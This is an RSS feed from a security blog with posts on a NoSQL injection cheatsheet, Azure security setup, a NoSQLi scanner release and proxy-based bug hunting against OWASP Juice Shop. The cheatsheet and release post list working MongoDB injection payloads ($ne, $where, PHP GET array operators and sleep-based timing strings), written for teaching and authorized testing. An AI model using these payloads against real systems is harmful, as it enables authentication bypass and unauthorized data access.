<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Null Sweep]]></title><description><![CDATA[Continuous Security, DevOps, and DevSecOps]]></description><link>https://nullsweep.com/</link><image><url>https://nullsweep.com/favicon.png</url><title>Null Sweep</title><link>https://nullsweep.com/</link></image><generator>Ghost 5.75</generator><lastBuildDate>Mon, 20 Apr 2026 14:47:23 GMT</lastBuildDate><atom:link href="https://nullsweep.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[NoSql Injection Cheatsheet]]></title><description><![CDATA[Learn how NoSQL Injection works, with example strings to inject to test for injections.]]></description><link>https://nullsweep.com/nosql-injection-cheatsheet/</link><guid isPermaLink="false">6089cdaed640d404fe9fe8cf</guid><category><![CDATA[nosqli]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[Pentesting]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Mon, 07 Jun 2021 21:14:32 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1614225678583-5da4476ebbc6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fGluamVjdGlvbnxlbnwwfHx8fDE2MjMwOTk4Nzg&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1614225678583-5da4476ebbc6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fGluamVjdGlvbnxlbnwwfHx8fDE2MjMwOTk4Nzg&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="NoSql Injection Cheatsheet"><p>I was recently discussing how to exploit NoSQL vulnerabilities with a bug bounty tester who had successfully used my <a 
href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">NoSQLi</a> program to find a vulnerability on a major site (and received a $3k bounty!). </p><p>Using the scan tool is a great way to find some injectable strings, but to extract data, it&apos;s important to understand the types of injections possible with NoSQL systems, and how they present. For instructions on setting up a test environment and an introduction to NoSQLi, you can also see my post <a href="https://nullsweep.com/a-nosql-injection-primer-with-mongo/">A NoSQL Injection Primer</a>.</p><p>In this post, I&apos;ll walk through the various ways that you might determine if injections are possible, focusing primarily on the most popular NoSQL database, Mongo. From simplest to hardest:</p><ul><li>Error based injection (when the server returns a clear NoSQL error)</li><li>Blind boolean based injection (when the server evaluates a statement as true or false)</li><li>Timing injection (when the response time reveals whether a statement was true)</li></ul><h2 id="where-how-to-inject-payloads">Where &amp; How to Inject Payloads</h2><p>Anywhere you might expect to see SQL injection, you can potentially find NoSQL injection. Consider URL parameters, POST parameters, and even sometimes HTTP headers.</p><p>GET requests can often be typed into the browser by adding NoSQL syntax directly into the URL:</p><pre><code>1. site.com/page?query=term || &apos;1&apos;==&apos;1
2. site.com/page?user[$ne]=nobody</code></pre><p>POST requests generally need to be intercepted and modified, as NoSQL often includes JSON object structures.</p><pre><code class="language-JSON">1. {&quot;username&quot;: &quot;user&quot;, &quot;password&quot;: &quot;pass&quot;} 
	would change to 
{&quot;username&quot;: {&quot;$ne&quot;: &quot;fakeuser&quot;}, &quot;password&quot;: &quot;pass&quot;}
2. {&quot;$where&quot;:  &quot;return true&quot;}</code></pre><p>Each NoSQL system may have its own syntax, but Mongo allows for both JSON (technically BSON, but that conversion generally happens under the hood, server side) and JavaScript. JS can run directly on the Mongo server if it is passed through functions that allow it and JS is enabled on the server (it is by default).</p><p>If you already understand SQL injection, the concepts here are mostly the same, and only the details differ.</p><h2 id="simple-error-based-nosql-injection-tests">Simple Error Based NoSQL Injection Tests</h2><p>The simplest way to determine if injection is possible is to input some special NoSQL characters, and see if the server returns an error. This might be a full error string indicating the NoSQL database in use, or something like a 500 error. </p><pre><code class="language-nosql">&apos;&quot;\/$[].&gt;</code></pre><ul><li>Plug this string into each GET parameter to see if an error occurs</li><li>Replace elements in posted JSON contents with these special characters, or NoSQL keywords like $ne, $eq, $where, $or, etc., to see if there are errors.</li><li>Send additional objects along with valid JSON. For instance <code>{&quot;user&quot;: &quot;nullsweep&quot;}</code> could become <code>{&quot;user&quot;: [&quot;nullsweep&quot;, &quot;foo&quot;]}</code> or <code>{&quot;$or&quot;: [{&quot;user&quot;: &quot;foo&quot;}, {&quot;user&quot;: &quot;realuser&quot;}]}</code></li></ul><p>Some of these characters may also trigger other injection vulnerabilities (JS injection, SQL injection, shell injection, etc.), so further testing may be needed to confirm a NoSQL backend.</p><h2 id="blind-boolean-injection">Blind Boolean Injection</h2><p>If sending special characters doesn&apos;t cause the site to send error information, it may still be possible to find an injection by sending boolean expressions (a true or false result) if the page changes depending on the answer. 
For instance, a product page with a product ID parameter that is injectable may return product details for one query, but a &quot;product not found&quot; message otherwise. </p><p>A backend query that is looking up a product by doing something like &quot;id = $id&quot; might use a query like <code>db.product.find( {&quot;id&quot;: 5} )</code>. Ideally, we would want to control the whole query to inject something always false, such as <code>db.product.find( {&quot;$and&quot;: [ {&quot;id&quot;: 5}, {&quot;id&quot;: 6} ] } )</code>. It isn&apos;t always possible to inject operators like <code>$and</code> and <code>$or</code>, because the operators precede the field labels.</p><p>Instead, we may have to try a few different things. We could try to make the query match everything but the ID 5: <code>db.product.find( {&quot;id&quot;: {&quot;$ne&quot;: 5} } )</code> or use the <code>$in</code> or <code>$nin</code> operators, such as <code>db.product.find( {&quot;id&quot;: {&quot;$in&quot;: []} })</code>, to ensure no data is returned.</p><p>If the injection is successful, you will see a difference between the &apos;true&apos; version and the &apos;false&apos; version. 
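To make the comparison concrete, the core of a blind boolean check can be sketched in a few lines of JavaScript (the response bodies below are hypothetical stand-ins for real HTTP responses):</p>

```javascript
// A parameter looks boolean-injectable when an always-true payload
// (e.g. {"$ne": -1}) returns the same page as the legitimate value,
// while an always-false payload (e.g. {"$in": []}) returns a
// different page.
function looksBooleanInjectable(baselineBody, trueBody, falseBody) {
  // A real tester should strip dynamic content (timestamps, CSRF
  // tokens) before comparing; this sketch compares raw bodies.
  return trueBody === baselineBody && falseBody !== baselineBody;
}

console.log(looksBooleanInjectable("product 5 details", "product 5 details", "product not found")); // true
console.log(looksBooleanInjectable("product 5 details", "product not found", "product not found")); // false
```

<p>In practice, you would issue three requests (the original value, an always-true payload, and an always-false payload) and feed the response bodies into a check like this.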
</p><h3 id="the-boolean-injection-cheatsheet-">The Boolean Injection Cheatsheet:</h3><ul><li><code>{&quot;$ne&quot;: -1}</code></li><li><code>{&quot;$in&quot;: []}</code></li><li><code>{&quot;$and&quot;: [ {&quot;id&quot;: 5}, {&quot;id&quot;: 6} ]}</code> </li><li><code>{&quot;$where&quot;: &#xA0;&quot;return true&quot;}</code></li><li><code>{&quot;$or&quot;: [{},{&quot;foo&quot;:&quot;1&quot;}]}</code></li><li><code>site.com/page?query=term || &apos;1&apos;==&apos;1</code></li><li><code>site.com/page?user[$ne]=nobody</code></li><li><code>site.com/page?user=;return true</code></li></ul><p>You may need to try appending certain characters to correctly terminate the query:</p><ul><li>//</li><li>%00</li><li>&apos;</li><li>&quot;</li><li>some number of closing brackets or braces, in some combination</li></ul><h2 id="timing-based-injection">Timing Based Injection</h2><p>Sometimes, even when injection is possible and the attacker has sent valid true and false values, the page response is identical, and it can&apos;t be determined whether an injection was successful.</p><p>In these cases, we can still try to determine if an injection takes place by asking the NoSQL instance to pause for a period of time before returning results, and detecting the resulting difference in time as the proof of successful injection. Timing injection is identical to blind boolean injection, except instead of trying to get the page to return <code>true</code> or <code>false</code> values, we try to get the page to load more slowly (for true) or more quickly (for false).</p><p>You will likely need several page loads to gather baseline timing information before beginning the injection. 
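The decision logic can be sketched as follows (a simplified example; the 0.8 tolerance factor is an arbitrary allowance for network jitter):</p>

```javascript
// Given baseline response times and the response time observed with a
// sleep payload injected (e.g. {"$where": "sleep(1000)"}), decide
// whether the requested delay actually showed up in the response.
function sleepDetected(baselineTimesMs, injectedTimeMs, sleepMs) {
  const slowestBaseline = Math.max(...baselineTimesMs);
  // Require most of the requested sleep to appear on top of the
  // slowest baseline measurement before calling it a detection.
  return injectedTimeMs > slowestBaseline + 0.8 * sleepMs;
}

console.log(sleepDetected([120, 140, 135], 1260, 1000)); // true
console.log(sleepDetected([120, 140, 135], 150, 1000)); // false
```

<p>With real requests, you would repeat the measurement several times to rule out a one-off slow response. 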
The longer the sleep time used in this injection type, the easier the injection is to spot in the results, but the longer it will take to gather information.</p><p>Timing injections are only possible where JS can be executed in the database, and can lead to other interesting attacks.</p><h3 id="timing-nosql-injection-cheatsheet-">Timing NoSql Injection Cheatsheet:</h3><ul><li><code>{&quot;$where&quot;: &#xA0;&quot;sleep(100)&quot;}</code></li><li><code>;sleep(100);</code></li></ul><h2 id="nosql-injection-limitations">NoSQL Injection Limitations</h2><p>Unlike SQL injection, finding that a site is injectable may not give unfettered access to the data. How the injection presents may allow full control over the backend, or only limited querying ability on a single schema. Because records don&apos;t follow a common structure, discovering the structure can prove an additional challenge when exploiting these types of vulnerabilities.</p><p>To automate finding all of these things, check out <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">NoSQLi</a>.</p><p>Happy Hunting!</p>]]></content:encoded></item><item><title><![CDATA[Azure Security Architecture]]></title><description><![CDATA[<p>In this article, I will walk through configuring and setting up all the Azure services needed to secure your account. 
There are many services available, but it can be difficult to understand what needs to be done to actually get protected and ensure that all assets are covered.</p><p>This is</p>]]></description><link>https://nullsweep.com/azure-security-architecture/</link><guid isPermaLink="false">600c02c5b189ab0511821656</guid><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 02 Feb 2021 14:31:58 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2021/01/azure_security_architecutre-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2021/01/azure_security_architecutre-1.png" alt="Azure Security Architecture"><p>In this article, I will walk through configuring and setting up all the Azure services needed to secure your account. There are many services available, but it can be difficult to understand what needs to be done to actually get protected and ensure that all assets are covered.</p><p>This is a broad topic, with a lot of nuance, so I will focus on the exact Azure services needed for a security program, and how to get started using them. Azure was built with security in mind, so compared to my articles on configuring <a href="https://nullsweep.com/advanced-aws-security-architecture/">AWS security</a>, this is much more straightforward. 
I have found that Azure generally makes it easier to achieve strong security.</p><p>Setting up a solid cloud security program generally consists of a few key components:</p><ul><li>Centralize logs from all cloud resources, and make sure they are stored in perpetuity (for investigations as needed, ideally in low-cost, long-term storage)</li><li>Monitor the logs for suspicious events, and alert into your SIEM</li><li>Configure automated configuration enforcement for the environment, so that teams can&apos;t make security mistakes (like deploying a database to listen for connections from anywhere)</li></ul><p>To achieve all of the above, we&apos;ll be leveraging the following services:</p><ul><li>Log Analytics to gather logs from our services</li><li>Security Center for best practices (assets and subscriptions)</li><li>Defender for automated threat analysis and indicators of compromise</li><li>Azure Sentinel for our SIEM (but you can integrate it with your existing SIEM as well)</li><li>Azure Policy for security governance</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/azure_security_architecutre.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="1461" height="592" srcset="https://nullsweep.com/content/images/size/w600/2021/01/azure_security_architecutre.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/azure_security_architecutre.png 1000w, https://nullsweep.com/content/images/2021/01/azure_security_architecutre.png 1461w" sizes="(min-width: 720px) 720px"><figcaption>Azure Security Architecture</figcaption></figure><p>That&apos;s a lot! Thankfully, most of this is pretty easy to configure. Let&apos;s jump in!</p><h2 id="centralizing-logs-with-log-analytics">Centralizing Logs with Log Analytics</h2><p>Your operations team may already be collecting logs and alerting based on performance metrics. 
We just need to ensure that the logs we care about are also being ingested. In particular, you may want to look at your AD logs, server syslogs, and any security product logs you have deployed.</p><p>To configure Log Analytics, log into the Azure Portal, and create a new Log Analytics Workspace. You could create a template here, but using the web interface is simple enough, since you are unlikely to create many of these resources. Allow Azure to deploy the instance, and once deployed, you can automatically connect assets to your analytics instance.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Log-Analytics-Setup.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="818" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Log-Analytics-Setup.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Log-Analytics-Setup.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Log-Analytics-Setup.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Log-Analytics-Setup.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Log Analytics Connection Setup</figcaption></figure><p>Log Analytics has a cost, based on both ingestion and total storage used. In addition, the maximum retention time for logs is 2 years, which may not be enough for all organizations. I recommend saving security-sensitive logs as long as possible, in case they are needed in future investigations. There is a <a href="https://techcommunity.microsoft.com/t5/azure-sentinel/move-your-azure-sentinel-logs-to-long-term-storage-with-ease/ba-p/1407153?ref=nullsweep.com">great write-up (and playbook) on how to configure this by Microsoft</a>.</p><h2 id="setup-security-center-defender">Setup Security Center &amp; Defender</h2><p>With logs being aggregated, we are now ready to set up Security Center. 
You&apos;ll need a role with Security Admin access to set up and configure everything. </p><p>To fully utilize Security Center, you&apos;ll also need the Azure monitoring agent deployed to assets. Security Center will show you unmonitored assets, and deploying agents can be done from within the asset control panel in most cases.</p><p>Security Center is helpful for finding recommendations on general cloud security health - for instance, suggesting general security improvements such as full disk encryption, or comparing your deployment against security standards.</p><p>Azure will also push the cost-plus Defender service pretty hard, and attempt to sell you an upgrade. I 
recommend you do the upgrade, at least on all internet-facing assets and critical system components. It is required for advanced monitoring and for out-of-the-box compliance and regulatory assessments. The cost is less than similar functionality from other security vendors, in my experience.</p><p>The first thing we&apos;ll do is add some regulatory standards to our compliance dashboard. Even if you don&apos;t have to adhere to them currently, I find that they provide a solid baseline, and Microsoft provides several out of the box. To enable one, click the compliance box from the dashboard, then manage compliance policies, and add one for each subscription. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Compliance-Configuration.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="1073" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Compliance-Configuration.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Compliance-Configuration.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Compliance-Configuration.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Compliance-Configuration.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Compliance configuration</figcaption></figure><p>I also suggest you craft your own, stricter policy groups for auditing. Security Center has more than 500 rules you can quickly add to a custom compliance group - everything from network rules to specifying that all servers have a particular application installed (such as a security agent). 
Of course, you can also write your own policies specific to your organization, but how to do that is out of scope for this post.</p><p>In the below screenshot, I have created a policy group that ensures SSH is not accessible from the internet, that my machines have Disaster Recovery configured, that Linux servers have Python installed (though in reality this would more likely be something like your HIDS agent or other security software), and that Postgres has some kind of network protection.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Custom-Policy.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="832" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Custom-Policy.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Custom-Policy.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Custom-Policy.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Custom-Policy.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Custom Security Policy</figcaption></figure><h2 id="setup-sentinel-for-your-siem">Setup Sentinel for your SIEM</h2><p>You may already have a SIEM that is integrated with your processes. </p><p>Start by connecting the Log Analytics instance(s) set up in the first step of this article. I won&apos;t go through all the setup steps here, because the Azure documentation already has good tutorials. 
Here are some to get started:</p><ul><li><a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-monitor-your-data?ref=nullsweep.com">Set up built-in workbooks</a></li><li><a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-detect-threats-built-in?ref=nullsweep.com">Enable out-of-the-box detection rules</a> (You can also <a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-detect-threats-custom?ref=nullsweep.com">create custom rules</a> if you have some proprietary or purchased rule sets)</li><li>Set up <a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-respond-threats-playbook?ref=nullsweep.com">automated responses</a> and alerts</li></ul><p>Finally, you may want to leverage these features in Sentinel, but continue to use a different SIEM (such as Splunk) for triage. Sentinel can be integrated with other systems, but you&apos;ll have to check with your SIEM vendor or set up some kind of custom data export. For Splunk, they offer an <a href="https://splunkbase.splunk.com/app/4564/?ref=nullsweep.com">Azure connector</a>.</p><h2 id="conclusions-and-other-resources">Conclusions and other Resources</h2><p>Implementing these services and spending some time thinking about how to leverage them in your organization will build a solid base for an Azure security program. </p><p>You&apos;ll have aggregated logs for security analysis, at-a-glance compliance (both regulatory and specific to your organization), and the ability to identify and respond to threats. </p><p>From here, you can write tailored custom policies to improve the overall security posture of the organization and automate responses to commonly seen threats.</p><p>Due to the breadth of these services, I didn&apos;t go too deep into any single service. 
Here are some excellent resources for learning more:</p><ul><li><a href="https://www.youtube.com/watch?v=hTS8jXEX_88&amp;ref=nullsweep.com">John Savill&apos;s Azure Master Class - monitoring &amp; security portion</a></li><li><a href="https://www.youtube.com/watch?v=cIh_Nfl67T0&amp;list=PLlVtbbG169nGccbp8VSpAozu3w9xSQJoY&amp;index=4&amp;ref=nullsweep.com">The same master class, Governance (policies)</a></li><li><a href="https://docs.microsoft.com/en-us/azure/security/?ref=nullsweep.com">Azure security documentation</a> (It&apos;s generally good, but can be hard to link all the various pieces you will need together)</li><li><a href="https://techcommunity.microsoft.com/t5/microsoft-security-and/ct-p/MicrosoftSecurityandCompliance?ref=nullsweep.com">Azure security community</a> (tons of good articles to find) </li></ul>]]></content:encoded></item><item><title><![CDATA[NoSQLi 0.5.1 Released]]></title><description><![CDATA[My NoSQL Injection tool now scans for additional types of PHP GET injections.]]></description><link>https://nullsweep.com/nosqli-0-5-1-released/</link><guid isPermaLink="false">5fd350eaa914eb05178f73af</guid><category><![CDATA[Tools]]></category><category><![CDATA[nosqli]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 31 Dec 2020 12:20:41 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/12/NoSQLi.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/12/NoSQLi.png" alt="NoSQLi 0.5.1 Released"><p>The next Alpha release for NoSQLi is ready for use! This version brings a few minor bug fixes and performance enhancements to existing scans. 
The primary new feature is the addition of certain PHP GET parameter injections.</p><p>This means that nosqli now has all the planned injection type detection completed - PHP GET, error based injection, boolean injection, blind boolean injection, and timing based boolean injection tests.</p><h2 id="what-are-php-get-injections">What are PHP GET injections?</h2><p>In PHP, using brackets in a GET parameter converts it into an array. For instance, a normal expected submission for some parameter might be something like <code>vulnerablesite.com/checkorder?id=12345</code>. When the PHP script retrieves this value, it sees a string containing the expected &quot;12345&quot; value. </p><p>However, we could instead modify the URL to something like <code>vulnerablesite.com/checkorder?id[$gt]=12345</code>. The added brackets will convert this value from a string into an array. The same PHP retrieval code will now return an array instead of a string: <code>array { &#xA0;[&quot;$gt&quot;]=&gt; &quot;something&quot;}</code>.</p><p>If this is being passed without proper checking directly into Mongo, we have achieved an injection, and can query the database using logic operators like not-equal, less-than, etc. In the example above, the query is modified from <code>array { [&quot;id&quot;] =&gt; &quot;12345&quot; }</code> to <code>array { [&quot;id&quot;] =&gt; array{ [&quot;$gt&quot;]=&gt; &quot;12345&quot; } }</code>, and Mongo will read that value array as a search for IDs greater than 12345.</p><h2 id="so-what-exactly-is-new-in-this-version">So what exactly is new in this version?</h2><p>In previous versions, nosqli checked only [$regex] values for injection, and might have caught others if the server was returning MongoDB errors when special characters were tested.</p><p>In the latest version, it now explicitly checks for all of these PHP GET injection types for all parameters on a page. 
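The bracket-to-array conversion that PHP performs can be simulated in JavaScript to see exactly what shape the server ends up with (a simplified sketch: one bracket level, no URL decoding):</p>

```javascript
// Mimic PHP's parsing of a query string, where "id[$gt]=12345"
// becomes an array/object rather than a plain string value.
function phpStyleParse(query) {
  const params = {};
  for (const pair of query.split("&")) {
    const [rawKey, value] = pair.split("=");
    const match = rawKey.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (match) {
      // Bracketed keys become nested objects - exactly the shape
      // Mongo interprets as an operator expression.
      const [, key, sub] = match;
      params[key] = params[key] || {};
      params[key][sub] = value;
    } else {
      params[rawKey] = value;
    }
  }
  return params;
}

console.log(JSON.stringify(phpStyleParse("id=12345"))); // {"id":"12345"}
console.log(JSON.stringify(phpStyleParse("id[$gt]=12345"))); // {"id":{"$gt":"12345"}}
```

<p>If an object shaped like the second result reaches a Mongo query unvalidated, the <code>$gt</code> key is interpreted as an operator rather than as data. 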
It is smart enough to check each parameter alone and with others (in the case where one parameter is dependent on the value in another).</p><p>Grab the <a href="https://github.com/Charlie-belmer/nosqli/releases/tag/v0.5.1?ref=nullsweep.com">latest release</a> on <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">GitHub</a>, take it for a spin, and see what you can find!</p>]]></content:encoded></item><item><title><![CDATA[Security Bug Hunting with Proxies]]></title><description><![CDATA[How to find security bugs and privacy violations using attack proxies. An introduction.]]></description><link>https://nullsweep.com/security-bug-hunting-with-proxies/</link><guid isPermaLink="false">5faef78d34e139245355875b</guid><category><![CDATA[Pentesting]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 17 Nov 2020 01:47:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1558639586-b55001b6f8ab?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1558639586-b55001b6f8ab?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Security Bug Hunting with Proxies"><p>When hunting security issues or checking applications for potential privacy violations, the first tool I reach for is a web proxy. I frequently get asked about the tools I screenshot in these posts, and asked about my process, so I decided to share the basic steps I take to test a web application for security or privacy issues. </p><p>This information is targeted at someone with basic knowledge of the HTTP protocol and how the web works. 
It also assumes familiarity with common website vulnerability classes like the <a href="https://owasp.org/www-project-top-ten/?ref=nullsweep.com">OWASP top 10</a>. Some programming helps too, but isn&apos;t required.</p><h2 id="web-attack-proxies">Web Attack Proxies</h2><p>When I first started in web app security, I just used my browser and the developer console for all testing. This can work, but sure makes it a lot harder to find and exploit vulnerabilities!</p><p>Web attack proxies are configured to be an intermediary between your browser and the target site, capturing all requests and responses made between you and the site. This lets you quickly inspect data flows, modify data in flight, and automate tests or other tasks. They also typically include a ton of other advanced features, like decoding or encoding data, passive and active vulnerability scans, and more. I&apos;ll only touch the surface of these options today, but once you start using a proxy it&apos;s easy to learn more!</p><p>There are three that I use on a regular basis:</p><ul><li><a href="https://portswigger.net/burp?ref=nullsweep.com">Burp Suite</a>: The industry standard. The community version is limited in many ways, but is still excellent software. This is my normal go-to proxy.</li><li><a href="https://www.zaproxy.org/?ref=nullsweep.com">OWASP ZAP</a>: Fully open source, with many of the same features as Burp. Sometimes it&apos;s even ahead in some areas. </li><li><a href="https://mitmproxy.org/?ref=nullsweep.com">mitmproxy</a>: I&apos;ve been trying to do more of my proxy work in mitmproxy lately. It&apos;s very automatable and fully open source.</li></ul><h2 id="using-burpsuite">Using BurpSuite</h2><p>Let&apos;s start with Burp. It&apos;s pretty easy to use and beginner-friendly, without sacrificing advanced features. Download it via the link above and fire it up. Once it opens, click through to a temporary project and select the &quot;proxy&quot; tab. 
</p><p>You can configure your normal browser to use Burp by setting the proxy to localhost:8080 and installing the generated Burp certificates (downloaded by navigating in that same browser to localhost:8080), but Burp includes a built-in Chromium browser already set up correctly. I&apos;d start by clicking the &quot;intercept is on&quot; button to disable intercept (it will pause all connections while you inspect the traffic, making the browser appear to be frozen) and then click open browser.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/burp_proxy_screen.png" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy"><figcaption>Burp proxy screen</figcaption></figure><p>Now, let&apos;s try attacking the vulnerable OWASP application Juice Shop. Open <a href="https://juice-shop.herokuapp.com/?ref=nullsweep.com#/">https://juice-shop.herokuapp.com/#/</a> in the Burp browser.</p><h2 id="reconnaissance">Reconnaissance</h2><p>The first step in bug hunting is understanding the application you are testing, and where it might have weaknesses. Normally, I browse around a site clicking various links and looking for areas that look interesting. A few things I immediately check out:</p><ul><li>Login forms or any kind of authentication flow.</li><li>Any forms I can submit (feedback, lead generation, etc). I submit every form with some valid test data so I can store the request in the proxy.</li><li>Any link that gives any kind of error (401/Unauthorized can be interesting to look for auth bypass, 500 server errors might indicate something exploitable, etc).</li><li>Any URL that looks like it might have a unique ID in it - things like site/product/1 or product?id=1 in the URL.</li><li>Any page that includes data submitted in the URL or a request on the page, or includes something that looks like a filename or URL. 
Something like view?file=thefile.txt</li></ul><p>I&apos;ll sometimes also spin up a scan like dirbuster if the site allows automated tools, but they can be pretty heavy sometimes. A few files to check for manually:</p><ul><li>.git directories</li><li>.htaccess files</li><li>robots.txt and anything interesting in it</li><li>If you know the software stack, configuration files for that stack.</li></ul><p>While looking around the site, if something looks particularly interesting, I may dive right into testing. Definitely take note of anything you want to return to.</p><p>As you have browsed around in the Burp browser, your &quot;target&quot; tab has been filling up with every page visited (request &amp; response is saved) and the proxy-&gt;HTTP History has also been keeping every request in order.</p><h2 id="finding-exploiting-a-vulnerability">Finding &amp; Exploiting a Vulnerability</h2><p>Juice Shop is full of vulnerabilities, so you should find plenty to play with. I&apos;ll start right into the authentication flow, and submit a fake username to log the request in the proxy. </p><p>Juice Shop is interesting in that not every request is stored in the target tab - so for the login form I have to look at the HTTP request history, since I didn&apos;t see the POST request where I was expecting it. </p><p>In the GIF below, you can see me find the login request, move to the repeater tool, run the request again with normal input, then with some special characters, revealing an error message that indicated SQL injection might be possible.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/Juice_shop_sqli.gif" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy" width="2479" height="1380"><figcaption>Finding a SQLi vulnerability in Juice Shop</figcaption></figure><p>It won&apos;t always be so simple - in this case we see a SQL error message clearly. 
It might also have presented exactly the same information as before (invalid user) while still being vulnerable. Usually, I would probe the form with several different inputs looking for variations in the response before moving on.</p><p>Keep in mind that a form like this can have more than just a SQL back end. A key part of testing is forming a mental model of the various technologies in use on the back end, and how they fit together. SQL is pretty common, but I have also seen NoSQL (Mongo), XML, the file system, and even network requests behind a form like this. Each will have a different attack surface.</p><h2 id="let-s-do-the-same-thing-but-with-mitmproxy">Let&apos;s do the same thing, but with mitmproxy</h2><p>If we wanted to automate the above tests in some way, or do any kind of brute forcing, we would need to upgrade to Burp Pro (which is worth it!). But we could also use a different proxy. ZAP works pretty similarly to Burp, but mitmproxy looks a little different. Here&apos;s the same flow in mitmproxy:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/mitmproxy_sqli.gif" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy" width="2303" height="935"><figcaption>Finding the same bug with mitmproxy</figcaption></figure><p>Mitmproxy requires a little extra setup - you&apos;ll need to install its CA cert into the browser you are using by navigating to mitm.it once you have the proxy configured in your browser.</p><p>It&apos;s a little harder to follow, because most interaction is with the keyboard. mitmproxy mostly follows vim keybindings.
<code>r</code> replays the request, <code>e</code> enters the editor, and the arrow keys or <code>q</code> navigate between screens.</p><h2 id="finding-privacy-violations">Finding Privacy Violations</h2><p>When testing for privacy issues in applications, the setup is the same: configure the application (or the entire machine) to put all network requests through the proxy. Use the application normally for a while, and monitor the flows.</p><p>This won&apos;t work as well if the application doesn&apos;t use the HTTP protocol (in which case, network monitoring tools or injecting into the process are required), but I find almost all applications use HTTP primarily.</p><p>As you use different functionality in the application or tool, watch the network requests and read through the request and response data carefully. Check URL parameters, cookie information, and data in the request headers and POST data. </p><p>This is often where decoding tools come in. Common encodings I have seen (where tools try to hide their privacy-violating practices) are Base64, hex, and URL encoding. Noticing what action generates what request can give a hint as to what data is being sent.</p><h2 id="conclusions">Conclusions</h2><p>And that&apos;s the basic workflow! Of course, there are many tools that help with finding specific classes of bugs, or help inspect particular tech stacks, or automate particular tests. I think that when first starting to hunt security bugs, it&apos;s good to understand how to do it manually, then move on to the more powerful tools to automate away the repetitive tasks you find yourself doing.</p><p>What other tools and methods do you like when bug hunting?</p>]]></content:encoded></item><item><title><![CDATA[NoSQLi - A Fast NoSQL Injection Scanner]]></title><description><![CDATA[NoSQLi is a CLI tool for testing NoSQL Databases, particularly MongoDB. 
